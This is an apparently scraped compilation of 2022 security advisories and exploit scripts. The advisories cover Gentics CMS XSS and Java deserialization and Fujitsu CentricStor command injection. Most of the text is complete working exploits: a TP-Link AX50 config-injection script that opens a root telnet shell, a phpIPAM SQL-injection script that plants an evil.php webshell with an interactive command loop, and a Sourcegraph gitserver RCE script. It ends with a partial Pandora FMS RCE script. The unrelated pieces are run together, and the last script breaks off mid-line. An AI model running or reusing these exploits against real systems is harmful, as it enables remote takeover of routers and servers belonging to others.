Gentics CMS version 5.36.29 suffers from persistent cross site scripting and unsafe java deserialization vulnerabilities.

SEC Consult Vulnerability Lab Security Advisory < 20220608-0 >  
=======================================================================  
               title: Stored Cross-Site Scripting & Unsafe Java Deserializiation  
             product: Gentics CMS  
  vulnerable version: 5.36.29, see section below  
       fixed version: 5.40.27, 5.41.15, 5.42.7, 5.43.1 or higher  
          CVE number: CVE-2022-30981, CVE-2022-30982  
              impact: high  
            homepage: https://www.gentics.com/  
               found: 2021-04-02  
                  by: Gerhard Hechenberger (Office Vienna)  
                      Steffen Robertz (Office Vienna)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Atos company  
                      Europe | Asia | North America

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"APA-IT Informations Technologie GmbH offers offers support with a focus on  
media solutions and IT-outsourcing. As a subsidiary of APA – Austria Press  
Agency, we are responsible for the IT of the Austrian news agency as well  
as numerous other media enterprises.  
This expertise and insight into the industry make APA-IT an expert for IT  
solutions for publishers and media-related companies. Existing systems and  
tools are constantly developed and tailored to individual customer needs.  
As such, APA-IT is always available – from conception to operation."

Source: https://www.gentics.com/genticscms/company_gentics.en.html

Business recommendation:  
------------------------  
The vendor provides a patch which should be installed immediately.

SEC Consult recommends to perform a thorough security review of these products  
conducted by security professionals to identify and resolve all security  
issues.

Vulnerability overview/description:  
-----------------------------------  
1) Multiple Stored Cross-Site Scripting Vulnerabilities (CVE-2022-30982)  
Multiple cross-site scripting vulnerabilities are present in the application.  
An attacker can store malicious JavaScript code in the username and profile  
description. The code will execute once an admin user hovers over the  
attacker's username. Thus, the attacker can execute code in the context of an  
admin.

2) Unsafe Java Deserialization (CVE-2022-30981)  
The Gentics CMS has an import option which will accept ZIP files. The archive  
includes a Java serialized object that gets deserialized on import. This can  
lead to code execution on the server.  
A low privileged user might be able to exploit this vulnerability by chaining  
it together with vulnerability 1).

Proof of concept:  
-----------------  
1) Multiple Stored Cross-Site Scripting Vulnerabilities (CVE-2022-30982)  
To trigger the first XSS, an attacker has to change the profile description to  
include a payload, e.g. "<script>alert(document.domain)</script)". The payload  
will execute once a user with access to the userlist hovers his mouse over the  
profile name. The event "onmouseover" will trigger following code:

JSI3_comp_list_401__ass( this, 'Properties', '<b>Malicious User Name</b><br>  
<script>alert(document.domain)</script><br><br>created:<br> 09/20/2002  
( Gentics Support)<br>last edited:<br>15:56 (Malicious Username)', '' );

The execution of the code leads to following function:

function JSI3_comp_list_401__ass( obj, title, text, assTitle )  
{  
  JSI3_comp_list_401__assReset();  
  clearTimeout( JSI3_comp_list_401___ass_timeout );  
  JSI3_comp_list_401__ass_show_row( obj, title, text, assTitle );  
}

The malicious code, which is contained in the "text" parameter, gets passed  
through to the next function. There it is added to an HTML element and thus  
executed in the browser.

function JSI3_comp_list_401__ass_show_row( obj, title, text, assTitle ) {  
  if (!JSI3_comp_list_401__ass_show_row_tipsy[obj.id]) {  
    JSI3_comp_list_401__ass_show_row_tipsy[obj.id] = true;  
    $(obj).attr('title', '<h6>'+title+'</h6>'+text+((assTitle)?'<br>'+assTitle:''));  
    $(obj).tipsy({  
      trigger: 'manual',  
      html: true,  
      offset: 3,  
      delayIn: 900,  
      delayOut: 0,  
      opacity: 0.85,  
      gravity: 'nww'  
    });  
  }  
  $(obj).tipsy("show");  
  gcn_active_tipsy = obj;  
}

Another XSS vector can be found in the parameters "First Name" and "Last Name".  
By e.g. changing the last name to 'Node" onload="alert(document.domain)',  
JavaScript code is added to the profile picture that is loaded in the upper  
right corner on every page. The following snippet shows the vulnerable line of  
code:

<div id="profil">  
<div><img src="?do=11&module=system&img=profile_man.png" title="Admin Node" onload="alert(document.domain)" class="profile_avatar"></div>

The third XSS is caused by changing the first and last name into JavaScript  
code without prior encoding. Changing the last name to  
"Last Name'+eval(alert(document.domain))+'" will cause the following code to be  
included in the server's response:

<script language="JavaScript" type="text/javascript">  
  var menus = new Array();  
  var imgs = new Array();  
  menus['Admin Last Name'+eval(alert(document.domain))+''] = new Array();  
  menus['Admin Last Name'+eval(alert(document.domain))+'']['layer_pos'] = 1;  
  menus['Admin Last Name'+eval(alert(document.domain))+'']['align'] = 'r';

2) Unsafe Java Deserialization (CVE-2022-30981)  
First, a malicious ZIP archive needs to be created. The following files will need to  
be included within this archive:

bundlebuild.xml:

<?xml version="1.0" encoding="UTF-8"?>  
<bundlebuild>  
  <bundleinfo>  
    <name><![CDATA[test4]]></name>  
    <sourcehost><![CDATA[b1d80757b76c]]></sourcehost>  
    <description><![CDATA[]]></description>  
    <globalid>9d6243ab-a281-11eb-9ae3-0242ac130004</globalid>  
    <globalprefix>D77D</globalprefix>  
  </bundleinfo>  
  <builds>  
    <build>  
      <builddate>1618996405</builddate>  
      <changelog><![CDATA[test4]]></changelog>  
      <count>0</count>  
    </build>  
  </builds>  
  <tables>  
  </tables>  
</bundlebuild>

containedobjects.xml:

<?xml version="1.0" encoding="UTF-8"?>  
<objects>  
</objects>

The third file has to be named "serializedjava.bin" and contains the actual  
payload. A demo payload can be generated with following command:  
$ ysoserial FileUpload1 'write;/tmp;SECTEST' > serializedjava.bin

Those three files have to be zipped together into an archive, which can be  
uploaded.

The import feature is available under Enterprise CMS -> Administration ->  
Import and Export. Now select New->Import and upload the malicious ZIP archive.  
Wait until the import completed. Now click on "Test succeeded" in the file  
list. On the new screen select "Start import in background". The payload should  
create a file called "upload_<random_uuid>.tmp" in the folder /tmp. It will  
contain the string "SECTEST".  
Better deserialization chains could be built to reach more interesting targets.  
It is very likely, that RCE could be obtained by writing an own deserialization  
chain.

Vulnerable / tested versions:  
-----------------------------  
The following product version has been tested and found to be vulnerable. Other versions  
are vulnerable as well, please see the vendor's changelog in the solution section.

* Gentics CMS 5.36.29

Vendor contact timeline:  
------------------------  
2022-04-04: Contacting vendor through support@gentics.com  
2022-04-04: Ticket SUP-13323 created.  
2022-04-05: Sent advisory via unencrypted email to provided vendor email address.  
2022-05-04: Updates for Gentics CMS were released on 14th April.  
2022-05-05: Gentics provides us with the fixed version numbers.  
2022-06-08: Release of security advisory.

Solution:  
---------  
Update to versions greater or equal to:  
* 5.40.27 (see https://gentics.com/Content.Node/changelog/5.40.0/5.40.27.html)  
* 5.41.15 (see https://gentics.com/Content.Node/changelog/5.41.0/5.41.15.html)  
* 5.42.7 (see https://gentics.com/Content.Node/changelog/5.42.0/5.42.7.html)  
* 5.43.1 (see https://gentics.com/Content.Node/changelog/5.43.0/5.43.1.html)

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult, an Atos company  
Europe | Asia | North America

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Atos company. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF Gerhard Hechenberger, Steffen Robertz / @2022

Gentics CMS 5.36.29 Cross Site Scripting / Deserialization

An issue was discovered on Fujitsu ETERNUS CentricStor CS8000 (Control Center) devices before 8.1A SP02 P04. The vulnerability resides in the grel_finfo function in grel.php. An attacker is able to influence the username (user), password (pw), and file-name (file) parameters and inject special characters such as semicolons, backticks, or command-substitution sequences in order to force the application to execute arbitrary commands.

**Summary**

On the 6th of April 2022, NCC Group’s Fox-IT discovered two separate flaws in FUJITSU CentricStor Control Center V8.1 which allows an attacker to gain remote code execution on the appliance without prior authentication or authorization.

The vulnerability is caused due to a lack of user input validation in two PHP scripts, which are normally included post-authentication. As no include-guards are in-place, an attacker is able to trigger the script without prior authentication by calling it directly.

**Impact**

An attacker is able to take control over the appliance as if they were logged in directly via a secure shell. If exploited, the attacker obtains limited user privileges on the machine as the “www-data” user; however, it should be noted that the Kernel on the system which NCC Group’s Fox-IT encountered is severely outdated, allowing an attacker to easily escalate their privileges to the administrative “root” user of the system.

Due to the sensitive nature of the system, any attacker with full control over the system is potentially able to read, modify and potentially destroy the entire virtual backup tapes, which could be used as an initial stage of a ransomware attack to ensure the victim is not able to recover and is forced to pay the ransom.

The following screenshot shows how NCC Group’s Fox-IT was able to gain remote code execution on the appliance using a custom-built Metasploit\[1\] module:

Figure 1 – Obtaining a Meterpreter\[2\] shell using a custom-built Metasploit module

**Details**

During a recent penetration test at one of NCC Group’s Fox-IT’s clients, a full review was performed of the backup process, as well as any appliances used, as to ensure the company has full system backups in the event of a ransomware breakout. One of the appliances in question was the FUJITSU CentricStor Control Center. Fox-IT requested read-only access to the appliance in order to assess the security of the product.

The web-application used to manage the backups was inspected, which lead NCC Group’s Fox-IT to discover the existence of two scripts, which are accessible by any user on the network and which pass user input directly to the “shell\_exec” and “system” functions.

The two files in questions are as follows:

*   /srv/www/htdocs/custom/library/system/grel.php
*   /srv/www/htdocs/custom/library/system/hw_view.php

**Command injection in grel.php (grelFileInfo)**

The first vulnerability resides in the “grel\_finfo” function in grel.php. An attacker is able to influence the username (“user”), password (“pw”), and file-name (“file”) parameters and inject special characters such as semicolons, backticks, or command-substitution sequences in order to force the application to execute arbitrary commands. The following screenshots show this in more detail:

Figure 2 – The grel\_finfo function is defined and passes the $pw and $user variables directly to the system function call

Figure 3 – The grel\_finfo function is called without any prior authentication

**Command injection in hw\_view.php**

The second vulnerability resides in the "requestTempFile" function in hw_view.php. An attacker is able to influence the “unitName” POST parameter and inject special characters such as semicolons, backticks, or command-substitution sequences in order to force the application to execute arbitrary commands. The following screenshot shows this in more detail:

Figure 4 – The $unitName POST variable is passed directly to the shell\_exec function without prior authentication

**Recommendation**

Upgrade the product to versions v8.1A SP02 P04 or v8.0A SP01. Unfortunately, a dedicated Fujitsu customer request is required to do this due the software distribution model. For more information please contact Fujitsu through their ServiceNow Portal or Support Assistant.

Lastly, block any inbound traffic to port 80 and 443 through the use of a network firewall. Traffic should be selectively allowed only to other instances of the appliance, and only made directly accessible through a management LAN. This ensures attackers are not able to reach the machine without gaining access to this network segment first.

Another temporary measure to secure the application for the time being could be to force the web-interface to bind to the local loopback interface (127.0.0.1) and using a reverse SSH forward to access the service that way. This ensures no attackers are able to reach the web-interface before authenticating over SSH first. Please note that this might void your warranty, as such it is not recommended.

**Vendor Notice**

*   Fujitsu-PSIRT-PSS-IS-2022-050316-Security-Notice-SF.pdf

**Footnotes**

1\. https://en.wikipedia.org/wiki/Metasploit\_Project

2\. https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/

3\. https://www.php.net/manual/en/function.escapeshellarg.php

**Published** May 27, 2022June 9, 2022

**Post navigation**

CVE-2022-31795: Technical Advisory – FUJITSU CentricStor Control Center <= V8.1 – Unauthenticated Command Injection

TP-Link AX50 router with firmware 210730 suffers from an authenticated remote code execution vulnerability.

    # Exploit Title: TP-Link Router AX50 firmware 210730 - Remote Code Execution (RCE) (Authenticated)# Exploit Author: Tomas Melicher# Technical Details: https://github.com/aaronsvk/CVE-2022-30075# Date: 2022-06-08# Vendor Homepage: https://www.tp-link.com/# Tested On: Tp-Link Archer AX50# Vulnerability Description: Remote Code Execution via importing malicious config file# CVE: CVE-2022-30075#!/usr/bin/python3import argparse # pip install argparseimport requests # pip install requestsimport binascii, base64, os, re, json, sys, time, math, random, hashlibimport tarfile, zlibfrom Crypto.Cipher import AES, PKCS1_v1_5, PKCS1_OAEP # pip install pycryptodomefrom Crypto.PublicKey import RSAfrom Crypto.Util.Padding import pad, unpadfrom Crypto.Random import get_random_bytesfrom urllib.parse import urlencodeclass WebClient(object):  def __init__(self, target, password):    self.target = target    self.password = password.encode('utf-8')    self.password_hash = hashlib.md5(('admin%s'%password).encode('utf-8')).hexdigest().encode('utf-8')    self.aes_key = (str(time.time()) + str(random.random())).replace('.','')[0:AES.block_size].encode('utf-8')    self.aes_iv = (str(time.time()) + str(random.random())).replace('.','')[0:AES.block_size].encode('utf-8')    self.stok = ''    self.session = requests.Session()    data = self.basic_request('/login?form=auth', {'operation':'read'})    if data['success'] != True:      print('[!] unsupported router')      return    self.sign_rsa_n = int(data['data']['key'][0], 16)    self.sign_rsa_e = int(data['data']['key'][1], 16)    self.seq = data['data']['seq']    data = self.basic_request('/login?form=keys', {'operation':'read'})    self.password_rsa_n = int(data['data']['password'][0], 16)    self.password_rsa_e = int(data['data']['password'][1], 16)    self.stok = self.login()  def aes_encrypt(self, aes_key, aes_iv, aes_block_size, plaintext):    cipher = AES.new(aes_key, AES.MODE_CBC, iv=aes_iv)    plaintext_padded = pad(plaintext, aes_block_size)    return cipher.encrypt(plaintext_padded)  def aes_decrypt(self, aes_key, aes_iv, aes_block_size, ciphertext):    cipher = AES.new(aes_key, AES.MODE_CBC, iv=aes_iv)    plaintext_padded = cipher.decrypt(ciphertext)    plaintext = unpad(plaintext_padded, aes_block_size)    return plaintext  def rsa_encrypt(self, n, e, plaintext):    public_key = RSA.construct((n, e)).publickey()    encryptor = PKCS1_v1_5.new(public_key)    block_size = int(public_key.n.bit_length()/8) - 11    encrypted_text = ''    for i in range(0, len(plaintext), block_size):      encrypted_text += encryptor.encrypt(plaintext[i:i+block_size]).hex()    return encrypted_text  def download_request(self, url, post_data):    res = self.session.post('http://%s/cgi-bin/luci/;stok=%s%s'%(self.target,self.stok,url), data=post_data, stream=True)    filepath = os.getcwd()+'/'+re.findall(r'(?<=filename=")[^"]+', res.headers['Content-Disposition'])[0]    if os.path.exists(filepath):      print('[!] can\'t download, file "%s" already exists' % filepath)      return    with open(filepath, 'wb') as f:      for chunk in res.iter_content(chunk_size=4096):        f.write(chunk)    return filepath  def basic_request(self, url, post_data, files_data={}):    res = self.session.post('http://%s/cgi-bin/luci/;stok=%s%s'%(self.target,self.stok,url), data=post_data, files=files_data)    return json.loads(res.content)  def encrypted_request(self, url, post_data):    serialized_data = urlencode(post_data)    encrypted_data = self.aes_encrypt(self.aes_key, self.aes_iv, AES.block_size, serialized_data.encode('utf-8'))    encrypted_data = base64.b64encode(encrypted_data)    signature = ('k=%s&i=%s&h=%s&s=%d'.encode('utf-8')) % (self.aes_key, self.aes_iv, self.password_hash, self.seq+len(encrypted_data))    encrypted_signature = self.rsa_encrypt(self.sign_rsa_n, self.sign_rsa_e, signature)    res = self.session.post('http://%s/cgi-bin/luci/;stok=%s%s'%(self.target,self.stok,url), data={'sign':encrypted_signature, 'data':encrypted_data}) # order of params is important    if(res.status_code != 200):      print('[!] url "%s" returned unexpected status code'%(url))      return    encrypted_data = json.loads(res.content)    encrypted_data = base64.b64decode(encrypted_data['data'])    data = self.aes_decrypt(self.aes_key, self.aes_iv, AES.block_size, encrypted_data)    return json.loads(data)  def login(self):    post_data = {'operation':'login', 'password':self.rsa_encrypt(self.password_rsa_n, self.password_rsa_e, self.password)}    data = self.encrypted_request('/login?form=login', post_data)    if data['success'] != True:      print('[!] login failed')      return    print('[+] logged in, received token (stok): %s'%(data['data']['stok']))    return data['data']['stok']class BackupParser(object):  def __init__(self, filepath):    self.encrypted_path = os.path.abspath(filepath)    self.decrypted_path = os.path.splitext(filepath)[0]    self.aes_key = bytes.fromhex('2EB38F7EC41D4B8E1422805BCD5F740BC3B95BE163E39D67579EB344427F7836') # strings ./squashfs-root/usr/lib/lua/luci/model/crypto.lua    self.iv = bytes.fromhex('360028C9064242F81074F4C127D299F6') # strings ./squashfs-root/usr/lib/lua/luci/model/crypto.lua  def aes_encrypt(self, aes_key, aes_iv, aes_block_size, plaintext):    cipher = AES.new(aes_key, AES.MODE_CBC, iv=aes_iv)    plaintext_padded = pad(plaintext, aes_block_size)    return cipher.encrypt(plaintext_padded)  def aes_decrypt(self, aes_key, aes_iv, aes_block_size, ciphertext):    cipher = AES.new(aes_key, AES.MODE_CBC, iv=aes_iv)    plaintext_padded = cipher.decrypt(ciphertext)    plaintext = unpad(plaintext_padded, aes_block_size)    return plaintext  def encrypt_config(self):    if not os.path.isdir(self.decrypted_path):      print('[!] invalid directory "%s"'%(self.decrypted_path))      return    # encrypt, compress each .xml using zlib and add them to tar archive    with tarfile.open('%s/data.tar'%(self.decrypted_path), 'w') as tar:      for filename in os.listdir(self.decrypted_path):        basename,ext = os.path.splitext(filename)        if ext == '.xml':          xml_path = '%s/%s'%(self.decrypted_path,filename)          bin_path = '%s/%s.bin'%(self.decrypted_path,basename)          with open(xml_path, 'rb') as f:            plaintext = f.read()          if len(plaintext) == 0:            f = open(bin_path, 'w')            f.close()          else:            compressed = zlib.compress(plaintext)            encrypted = self.aes_encrypt(self.aes_key, self.iv, AES.block_size, compressed)            with open(bin_path, 'wb') as f:              f.write(encrypted)          tar.add(bin_path, os.path.basename(bin_path))          os.unlink(bin_path)    # compress tar archive using zlib and encrypt    with open('%s/md5_sum'%(self.decrypted_path), 'rb') as f1, open('%s/data.tar'%(self.decrypted_path), 'rb') as f2:      compressed = zlib.compress(f1.read()+f2.read())    encrypted = self.aes_encrypt(self.aes_key, self.iv, AES.block_size, compressed)    # write into final config file    with open('%s'%(self.encrypted_path), 'wb') as f:      f.write(encrypted)    os.unlink('%s/data.tar'%(self.decrypted_path))  def decrypt_config(self):    if not os.path.isfile(self.encrypted_path):      print('[!] invalid file "%s"'%(self.encrypted_path))      return    # decrypt and decompress config file    with open(self.encrypted_path, 'rb') as f:      decrypted = self.aes_decrypt(self.aes_key, self.iv, AES.block_size, f.read())    decompressed = zlib.decompress(decrypted)    os.mkdir(self.decrypted_path)    # store decrypted data into files    with open('%s/md5_sum'%(self.decrypted_path), 'wb') as f:      f.write(decompressed[0:16])    with open('%s/data.tar'%(self.decrypted_path), 'wb') as f:      f.write(decompressed[16:])    # untar second part of decrypted data    with tarfile.open('%s/data.tar'%(self.decrypted_path), 'r') as tar:      tar.extractall(path=self.decrypted_path)    # decrypt and decompress each .bin file from tar archive    for filename in os.listdir(self.decrypted_path):      basename,ext = os.path.splitext(filename)      if ext == '.bin':        bin_path = '%s/%s'%(self.decrypted_path,filename)        xml_path = '%s/%s.xml'%(self.decrypted_path,basename)        with open(bin_path, 'rb') as f:          ciphertext = f.read()        os.unlink(bin_path)        if len(ciphertext) == 0:          f = open(xml_path, 'w')          f.close()          continue        decrypted = self.aes_decrypt(self.aes_key, self.iv, AES.block_size, ciphertext)        decompressed = zlib.decompress(decrypted)        with open(xml_path, 'wb') as f:          f.write(decompressed)    os.unlink('%s/data.tar'%(self.decrypted_path))  def modify_config(self, command):    xml_path = '%s/ori-backup-user-config.xml'%(self.decrypted_path)    if not os.path.isfile(xml_path):      print('[!] invalid file "%s"'%(xml_path))      return    with open(xml_path, 'r') as f:      xml_content = f.read()    # https://openwrt.org/docs/guide-user/services/ddns/client#detecting_wan_ip_with_script    payload = '<service name="exploit">\n'    payload += '<enabled>on</enabled>\n'    payload += '<update_url>http://127.0.0.1/</update_url>\n'    payload += '<domain>x.example.org</domain>\n'    payload += '<username>X</username>\n'    payload += '<password>X</password>\n'    payload += '<ip_source>script</ip_source>\n'    payload += '<ip_script>%s</ip_script>\n' % (command.replace('<','<').replace('&','&'))    payload += '<interface>internet</interface>\n' # not worked for other interfaces    payload += '<retry_interval>5</retry_interval>\n'    payload += '<retry_unit>seconds</retry_unit>\n'    payload += '<retry_times>3</retry_times>\n'    payload += '<check_interval>12</check_interval>\n'    payload += '<check_unit>hours</check_unit>\n'    payload += '<force_interval>30</force_interval>\n'    payload += '<force_unit>days</force_unit>\n'    payload += '</service>\n'    if '<service name="exploit">' in xml_content:      xml_content = re.sub(r'<service name="exploit">[\s\S]+?</service>\n</ddns>', '%s</ddns>'%(payload), xml_content, 1)    else:      xml_content = xml_content.replace('</service>\n</ddns>', '</service>\n%s</ddns>'%(payload), 1)    with open(xml_path, 'w') as f:      f.write(xml_content)arg_parser = argparse.ArgumentParser()arg_parser.add_argument('-t', metavar='target', help='ip address of tp-link router', required=True)arg_parser.add_argument('-p', metavar='password', required=True)arg_parser.add_argument('-b', action='store_true', help='only backup and decrypt config')arg_parser.add_argument('-r', metavar='backup_directory', help='only encrypt and restore directory with decrypted config')arg_parser.add_argument('-c', metavar='cmd', default='/usr/sbin/telnetd -l /bin/login.sh', help='command to execute')args = arg_parser.parse_args()client = WebClient(args.t, args.p)parser = Noneif not args.r:  print('[*] downloading config file ...')  filepath = client.download_request('/admin/firmware?form=config_multipart', {'operation':'backup'})  if not filepath:    sys.exit(-1)  print('[*] decrypting config file "%s" ...'%(filepath))  parser = BackupParser(filepath)  parser.decrypt_config()  print('[+] successfully decrypted into directory "%s"'%(parser.decrypted_path))if not args.b and not args.r:  filepath = '%s_modified'%(parser.decrypted_path)  os.rename(parser.decrypted_path, filepath)  parser.decrypted_path = os.path.abspath(filepath)  parser.encrypted_path = '%s.bin'%(filepath)  parser.modify_config(args.c)  print('[+] modified directory with decrypted config "%s" ...'%(parser.decrypted_path))if not args.b:  if parser is None:    parser = BackupParser('%s.bin'%(args.r.rstrip('/')))  print('[*] encrypting directory with modified config "%s" ...'%(parser.decrypted_path))  parser.encrypt_config()  data = client.basic_request('/admin/firmware?form=config_multipart', {'operation':'read'})  timeout = data['data']['totaltime'] if data['success'] else 180  print('[*] uploading modified config file "%s"'%(parser.encrypted_path))  data = client.basic_request('/admin/firmware?form=config_multipart', {'operation':'restore'}, {'archive':open(parser.encrypted_path,'rb')})  if not data['success']:    print('[!] unexpected response')    print(data)    sys.exit(-1)  print('[+] config file successfully uploaded')  print('[*] router will reboot in few seconds... when it becomes online again (few minutes), try "telnet %s" and enjoy root shell !!!'%(args.t))

TP-Link AX50 Remote Code Execution

phpIPAM version 1.4.5 suffers from an authenticated remote code execution vulnerability.

    # Exploit Title: phpIPAM 1.4.5 - Remote Code Execution (RCE) (Authenticated)# Date: 2022-04-10# Exploit Author: Guilherme '@behiNdyk1' Alves# Vendor Homepage: https://phpipam.net/# Software Link: https://github.com/phpipam/phpipam/releases/tag/v1.4.5# Version: 1.4.5# Tested on: Linux Ubuntu 20.04.3 LTS#!/usr/bin/env python3import requestsimport argparsefrom sys import exit, argvfrom termcolor import coloredbanner = """█▀█ █░█ █▀█ █ █▀█ ▄▀█ █▀▄▀█   ▄█ ░ █░█ ░ █▀   █▀ █▀█ █░░ █   ▀█▀ █▀█   █▀█ █▀▀ █▀▀█▀▀ █▀█ █▀▀ █ █▀▀ █▀█ █░▀░█   ░█ ▄ ▀▀█ ▄ ▄█   ▄█ ▀▀█ █▄▄ █   ░█░ █▄█   █▀▄ █▄▄ ██▄█▄▄ █▄█   █▄▄ █▀▀ █░█ █ █▄░█ █▀▄ █▄█ █▀ █▀▀ █▀▀█▄█ ░█░   █▄█ ██▄ █▀█ █ █░▀█ █▄▀ ░█░ ▄█ ██▄ █▄▄\n"""print(banner)parser = argparse.ArgumentParser(usage="./exploit.py -url http://domain.tld/ipam_base_url -usr username -pwd password -cmd 'command_to_execute' --path /system/writable/path/to/save/shell", description="phpIPAM 1.4.5 - (Authenticated) SQL Injection to RCE")parser.add_argument("-url", type=str, help="URL to vulnerable IPAM", required=True)parser.add_argument("-usr", type=str, help="Username to log in as", required=True)parser.add_argument("-pwd", type=str, help="User's password", required=True)parser.add_argument("-cmd", type=str, help="Command to execute", default="id")parser.add_argument("--path", type=str, help="Path to writable system folder and accessible via webserver (default: /var/www/html)", default="/var/www/html")parser.add_argument("--shell", type=str, help="Spawn a shell (non-interactive)", nargs="?")args = parser.parse_args()url = args.urlusername = args.usrpassword = args.pwdcommand = args.cmdpath = args.path# Validating urlif url.endswith("/"):  url = url[:-1]if not url.startswith("http://") and not url.startswith("https://"):  print(colored("[!] Please specify a valid scheme (http:// or https://) before the domain.", "yellow"))  exit()def login(url, username, password):  """Takes an username and a password and tries to execute a login (IPAM)"""  data = {  "ipamusername": username,  "ipampassword": password  }  print(colored(f"[...] Trying to log in as {username}", "blue"))  r = requests.post(f"{url}/app/login/login_check.php", data=data)  if "Invalid username or password" in r.text:    print(colored(f"[-] There's an error when trying to log in using these credentials --> {username}:{password}", "red"))    exit()  else:    print(colored("[+] Login successful!", "green"))    return str(r.cookies['phpipam'])auth_cookie = login(url, username, password)def exploit(url, auth_cookie, path, command):  print(colored("[...] Exploiting", "blue"))  vulnerable_path = "app/admin/routing/edit-bgp-mapping-search.php"  data = {  "subnet": f"\" Union Select 1,0x201c3c3f7068702073797374656d28245f4745545b2018636d6420195d293b203f3e201d,3,4 INTO OUTFILE '{path}/evil.php' -- -",  "bgp_id": "1"  }  cookies = {  "phpipam": auth_cookie  }  requests.post(f"{url}/{vulnerable_path}", data=data, cookies=cookies)  test = requests.get(f"{url}/evil.php")  if test.status_code != 200:    return print(colored(f"[-] Something went wrong. Maybe the path isn't writable. You can still abuse of the SQL injection vulnerability at {url}/index.php?page=tools&section=routing&subnetId=bgp&sPage=1", "red"))  if "--shell" in argv:    while True:      command = input("Shell> ")      r = requests.get(f"{url}/evil.php?cmd={command}")      print(r.text)  else:    print(colored(f"[+] Success! The shell is located at {url}/evil.php. Parameter: cmd", "green"))    r = requests.get(f"{url}/evil.php?cmd={command}")    print(f"\n\n[+] Output:\n{r.text}")exploit(url, auth_cookie, path, command)

phpIPAM 1.4.5 Remote Code Execution

Sourcegraph Gitserver version 3.36.3 suffers from a remote code execution vulnerability.

    # Exploit Title: Sourcegraph Gitserver 3.36.3 - Remote Code Execution (RCE)# Date: 2022-06-10# Exploit Author: Altelus# Vendor Homepage: https://about.sourcegraph.com/# Version: 3.63.3 # Tested on: Linux# CVE : CVE-2022-23642# Docker Container: sourcegraph/server:3.36.3# Sourcegraph prior to 3.37.0 has a remote code execution vulnerability on its gitserver service. # This is due to lack of restriction on git config execution thus "core.sshCommand" can be passed # on the HTTP arguments which can contain arbitrary bash commands. Note that this is only possible # if gitserver is exposed to the attacker. This is tested on Sourcegraph 3.36.3## Exploitation parameters:# - Exposed Sourcegraph gitserver# - Existing repo on sourcegraphimport jsonimport argparseimport requestsdef exploit(host, existing_git, cmd):    # setting sshCommand    data = {        "Repo" : existing_git,        "Args" : [            "config",            "core.sshCommand",            cmd        ]    }    res = requests.get(host+"/exec", json=data).text    if len(res) > 0:        print("[-] Didn't work: {}".format(res))        exit(0)    # setting fake origin    data = {        "Repo" : existing_git,        "Args" : [            "remote",            "add",            "origin",            "git@lolololz:foo/bar.git"        ]    }    res = requests.get(host+"/exec", json=data).text    if len(res) > 0:        print("[-] Didn't work: {}".format(res))        exit(0)    # triggering command using push    data = {        "Repo" : existing_git,        "Args" : [            "push",            "origin",            "master"        ]    }    res = requests.get(host+"/exec", json=data).text    print("[*] Finished executing exploit")parser = argparse.ArgumentParser()parser.add_argument('--gitserver-host', required=True, help="Target Sourcegraph Gitserver Host")parser.add_argument('--existing-git', required=True, help="e.g. Link of existing repository in target Sourcegraph")parser.add_argument('--cmd', required=True, help="Command to run")args = parser.parse_args()host = args.gitserver_hostexisting_git = args.existing_gitcmd = args.cmdexploit(host, existing_git, cmd)

Sourcegraph Gitserver 3.36.3 Remote Code Execution

Pandora FMS version 7.0NG.742 suffers from an authenticated remote code execution vulnerability.

    # Exploit Title: Pandora FMS v7.0NG.742 - Remote Code Execution (RCE) (Authenticated)# Date: 05/20/2022# Exploit Author: UNICORD (NicPWNs & Dev-Yeoj)# Vendor Homepage: https://pandorafms.com/# Software Link: https://sourceforge.net/projects/pandora/files/Pandora%20FMS%207.0NG/742_FIX_PERL2020/Tarball/pandorafms_server-7.0NG.742_FIX_PERL2020.tar.gz# Version: v7.0NG.742# Tested on: Pandora FMS v7.0NG.742 (Ubuntu)# CVE: CVE-2020-5844# Source: https://github.com/UNICORDev/exploit-CVE-2020-5844# Description: index.php?sec=godmode/extensions&sec2=extensions/files_repo in Pandora FMS v7.0 NG allows authenticated administrators to upload malicious PHP scripts, and execute them via base64 decoding of the file location. This affects v7.0NG.742_FIX_PERL2020.#!/usr/bin/env python3# Importstry:    import requestsexcept:    print(f"ERRORED: RUN: pip install requests")    exit()import sysimport timeimport urllib.parse# Class for colorsclass color:    red = '\033[91m'    gold = '\033[93m'    blue = '\033[36m'    green = '\033[92m'    no = '\033[0m'# Print UNICORD ASCII Artdef UNICORD_ASCII():    print(rf"""{color.red}        _ __,~~~{color.gold}/{color.red}_{color.no}        {color.blue}__  ___  _______________  ___  ___{color.no}{color.red}    ,~~`( )_( )-\|       {color.blue}/ / / / |/ /  _/ ___/ __ \/ _ \/ _ \{color.no}{color.red}        |/|  `--.       {color.blue}/ /_/ /    // // /__/ /_/ / , _/ // /{color.no}{color.green}_V__v___{color.red}!{color.green}_{color.red}!{color.green}__{color.red}!{color.green}_____V____{color.blue}\____/_/|_/___/\___/\____/_/|_/____/{color.green}....{color.no}    """)# Print exploit help menudef help():    print(r"""UNICORD Exploit for CVE-2020-5844 (Pandora FMS v7.0NG.742) - Remote Code ExecutionUsage:  python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -u <username> <password>  python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID>  python3 